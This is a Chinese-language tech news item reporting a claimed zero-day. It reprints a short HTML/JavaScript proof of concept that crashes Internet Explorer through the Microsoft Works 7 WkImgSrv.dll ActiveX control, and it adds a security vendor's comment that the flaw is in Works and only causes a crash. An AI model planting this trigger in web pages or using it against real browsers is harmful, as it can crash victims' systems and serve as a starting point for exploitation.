中國IT實驗室4月21日報導:近日收到網友發來的郵件,反映了一個Windows 0Day漏洞。並在其博客中給出了相關代碼。
[0day]Microsoft Works 7 WkImgSrv.dll crash POC,dll版本7.03.0616.0,IE7+Windows XP SP2 測試通過。
[html]
[head]
[title]Microsoft Works 7 WkImgSrv.dll crash POC[/title]
[script language="JavaScript"]
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
[/script]
[/head]
[body onload="JavaScript: return payload();"]
[object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj"]
[/object]
[/body]
[/html]
與金山專家李鐵軍聯繫,得到了珠海研發中心的回覆,如下:
近幾天網絡上流傳著一個傳說為IE 0DAY的POC代碼,在Windows XP系統環境下通殺了IE6和IE7,其它系統並未經過測試。其實這個漏洞並不是存在於IE,而是Microsoft Works的組件被挖掘出漏洞,部分的Windows XP預裝了Microsoft Works,所以就出現了過全補丁系統的漏洞(如華碩易PC 就預裝了Microsoft Works)。這段攻擊代碼會讓瀏覽器崩潰,目前尚不能因此傳播惡意軟件。
留言列表